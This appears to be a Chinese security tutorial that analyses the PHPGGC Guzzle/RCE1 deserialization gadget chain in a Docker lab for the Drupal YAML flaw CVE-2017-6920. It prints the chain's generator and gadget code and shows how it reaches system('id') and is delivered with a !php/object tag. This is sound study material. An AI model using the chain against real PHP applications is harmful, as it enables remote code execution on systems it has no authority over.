本文首发于先知:https://xz.aliyun.com/t/5450

PHPGGC学习----理论部分对PHPGGC工具的使用方法有了一个基本的了解,接下来需要利用实践环境进行一个实践操作,巩固一下刚才所学习的内容:

环境:

https://github.com/Medicean/VulApps/tree/master/d/drupal/1
docker pull medicean/vulapps:d_drupal_1
docker run -d -p 8000:80 medicean/vulapps:d_drupal_1
CVE-2017-6920  YAML 解析器处理不当导致的一个远程代码执行漏洞

其中pop链在gadgets.php文件中,pop链的逻辑和描述在chain.php文件中,以Guzzle/RCE1为例子进行分析:

chain.php:

<?php

namespace GadgetChain\Guzzle;

class RCE1 extends \PHPGGC\GadgetChain\RCE

{

    public static $version = '6.0.0 <= 6.3.2';

    public static $vector = '__destruct';

    public static $author = 'proclnas';

    public static $informations = '

        This chain requires GuzzleHttp\Psr7 < 1.5.0, because FnStream cannot be

        deserialized afterwards.

        See https://github.com/ambionics/phpggc/issues/34

    ';

    public function generate(array $parameters)

    {

        $function = $parameters['function'];

        $parameter = $parameters['parameter'];

        return new \GuzzleHttp\Psr7\FnStream([

            'close' => [

                new \GuzzleHttp\HandlerStack($function, $parameter),

                'resolve'

            ]

        ]);

    }

}

从其中可以看到其对使用该组件的描述,要求GuzzleHttp\Psr7的版本要小于1.5.0,具体的逻辑在gengrate成员方法中,其中入口参数为数组parameters,

其包括function和parameter两个参数,分别为要进行rce的函数和函数的参数,其返回的即是\GuzzleHttp\Psr7\FnStream的匿名对象,其入口参数为一个数组,数组包括一个数组元素,键名为close,键值为一个数组,

包括\GuzzleHttp\HandlerStack匿名对象,以及resolve字符串,至此构造序列化对象的逻辑结束,接下来结合gadgets.php看一下整个链是如何连起来的

gadgets.php

<?php

namespace Psr\Http\Message

{

    interface StreamInterface{}

}

namespace GuzzleHttp\Psr7

{

    class FnStream implements \Psr\Http\Message\StreamInterface

    {

        private $methods;

        public function __construct(array $methods)

        {

            $this->methods = $methods;

            foreach ($methods as $name => $fn) {

                $this->{'_fn_' . $name} = $fn;

            }

        }

        /*

        public function __destruct()

        {

            if (isset($this->_fn_close)) {

                call_user_func($this->_fn_close);

            }

        }

        public function close()

        {

            return call_user_func($this->_fn_close);

        }

        */

    }

}

namespace GuzzleHttp

{

    class HandlerStack

    {

        private $handler;

        private $stack;

        private $cached = false;

        function __construct($function, $parameter)

        {

            $this->stack = [[$function]];

            $this->handler = $parameter;

        }

        /*

        public function resolve()

        {

            if (!$this->cached) {

                if (!($prev = $this->handler)) {

                    throw new \LogicException('No handler has been specified');

                }

                foreach (array_reverse($this->stack) as $fn) {

                    $prev = $fn[0]($prev);

                }

                $this->cached = $prev;

            }

            return $this->cached;

        }

        */

    }

}

在类HandlerStack的构造方法中传入了rce要使用的函数及参数,并赋值给$this->stack和$this->handler,然后在类FnStream的构造方法中传入包含键close的数组,此时

将会拼接出一个_fn_close=[new \GuzzleHttp\HandlerStack($function, $parameter),'resolve'],这_fn_close的第一个元素其实已经实例化为一个匿名对象了,这里为了好理解先写成实例化前的形式。然后在FnStream的__destruct()函数中将会调用$this->_fn_close,即构成:

call_user_func([new \GuzzleHttp\HandlerStack($function, $parameter),'resolve'])

以上这种调用的形式在php官方文档中存在此种调用类中方法的形式:

所以此时关注类HandlerStack的resolve方法:

其中将利用php的动态函数的性质来构成rce的函数调用,比如此时假设:

[new \GuzzleHttp\HandlerStack($function, $parameter),'resolve']=》[new \GuzzleHttp\HandlerStack("system", "id"),'resolve']

即此时$prev参数首先经过$prev = $this->handler以后为id,接着经过foreach (array_reverse($this->stack) as $fn),$fn将为包含一个元素的数组["system"],然后经过

$prev = $fn[0]($prev);赋值以后$fn[0]即为system,即$prev即为system("id");最后函数调用返回再传入call_user_func,即构成call_user_func(system("id")) ;

到此,整个调用链已经分析结束,实现的原理也清楚了,接下来利用其生成的序列化payload来测试一下:

因为生成的序列化数据里面含有空字节,因此将payload输出到文件中使用php的addslashes函数转义一下:

接着就可以加上在序列化数据前加上YAML_PHP_TAG,即!php/object 标签

PHPGGC学习----实践的更多相关文章

  1. 使用sklearn进行集成学习——实践

    系列 <使用sklearn进行集成学习——理论> <使用sklearn进行集成学习——实践> 目录 1 Random Forest和Gradient Tree Boosting ...

  2. Nagios学习实践系列——基本安装篇

    开篇介绍 最近由于工作需要,学习研究了一下Nagios的安装.配置.使用,关于Nagios的介绍,可以参考我上篇随笔Nagios学习实践系列——产品介绍篇 实验环境 操作系统:Red Hat Ente ...

  3. Nagios学习实践系列——配置研究[监控当前服务器]

    其实上篇Nagios学习实践系列——基本安装篇只是安装了Nagios基本组件,虽然能够打开主页,但是如果不配置相关配置文件文件,那么左边菜单很多页面都打不开,相当于只是一个空壳子.接下来,我们来学习研 ...

  4. 前端学习实践笔记--JavaScript深入【1】

    这一年中零零散散看过几本javascript的书,回过头看之前写过的javascript学习笔记,未免有点汗颜,突出“肤浅”二字,然越深入越觉得javascript的博大精深,有种只缘身在此山中的感觉 ...

  5. Appium学习实践(四)结构优化

    随着我们测试脚本中的用例越来越多,我们不可能将所有的用例都放在同一个脚本中,所以我们需要优化我们的结构.将脚本放在一个文件夹中,再通过别的脚本来执行脚本.这样,我们也可以有选择性的执行我们的脚本 先来 ...

  6. Appium学习实践(三)测试用例脚本以及测试报告输出

    之前Appium学习实践(二)Python简单脚本以及元素的属性设置中的脚本,会有一个问题,就是在每个测试用例完成之后都会执行tearDown,然后重新setUp,这样导致脚本的执行效率偏低,而且会有 ...

  7. Appium学习实践(二)Python简单脚本以及元素的属性设置

    1.简单的Python脚本 Appium中的设置与Appium学习实践(一)简易运行Appium中的一致 Launch后,执行脚本 #coding:utf-8 import unittest impo ...

  8. ReactNative学习实践--Navigator实践

    离上次写RN笔记有一段时间了,期间参与了一个新项目,只在最近的空余时间继续学习实践,因此进度比较缓慢,不过这并不代表没有新进展,其实这个小东西离上次发文时已经有了相当大的变化了,其中影响最大的变化就是 ...

  9. ReactNative学习实践--动画初探之加载动画

    学习和实践react已经有一段时间了,在经历了从最初的彷徨到解决痛点时的兴奋,再到不断实践后遭遇问题时的苦闷,确实被这一种新的思维方式和开发模式所折服,react不是万能的,在很多场景下滥用反而会适得 ...

随机推荐

  1. python unittest之断言及示例

    python unintest单元测试框架提供了一整套内置的断言方法. 如果断言失败,则抛出一个AssertionError,并标识该测试为失败状态 如果异常,则当做错误来处理 注意:以上两种方式的区 ...

  2. hibernate 数据关联多对多

    多对多,必须有一张关系表来维持关系 数据库student,teacher student_teacher 三张表 但是在pojo中只需要建立student和teacher两个类,除非关系表也代表某种业 ...

  3. 关于redis,学会这8点就够了(转)

    1.redis是什么 redis是一种支持Key-Value等多种数据结构的存储系统.可用于缓存.事件发布或订阅.高速队列等场景.该数据库使用ANSI C语言编写,支持网络,提供字符串.哈希.列表.队 ...

  4. Mysql 数据库时间更新字段

    关于时间更新: 创建时间: CURRENT_TIMESTAMP 更新时间: 勾选根据时间戳更新

  5. C++之vector模板类

    vector 称为容器模板类,是同一种类型的对象的集合,每个对象都有一个对应的整数索引值.vector 不是一种数据类型,而只是一个类模板,可用来定义任意多种数据类型.vector 类型的每一种都指定 ...

  6. css中的定位属性position(转)

    css中的定位属性position   同样的也是上课的时候发现学生难以理解的一些问题拿出来记录一下,希望帮助初学者. 在css中定位属性position的运用在页面中是很常用的,特别是一些结合js来 ...

  7. Ubuntu Linux 使用桂电校园网 上网

    2016年9月1日 星期四 桂电校园网今天升级新的出校器,旧的出校器已经不能使用,所以本篇博客已经过期,下面的方法已经不能让Ubuntu使用桂电校园网上外网了.详细的原因,请到这个网站查看:校园网计费 ...

  8. BerkeleyDB原理及其对应API

    BerkeleyDB(简称为BDB)是一种以key-value为结构的嵌入式数据库引擎: 嵌入式:bdb提供了一系列应用程序接口(API),调用这些接口很简单,应用程序和bdb所提供的库一起编译/链接 ...

  9. synchronized关键字的作用域

    转自:http://www.cnblogs.com/devinzhang/archive/2011/12/14/2287675.html 1.synchronized关键字的作用域有二种: 1)是某个 ...

  10. Codeforces Round #524 (Div. 2) D(思维,构造)

    #include<bits/stdc++.h>using namespace std;long long dp[107];int main(){    int cnt=1;    dp[1 ...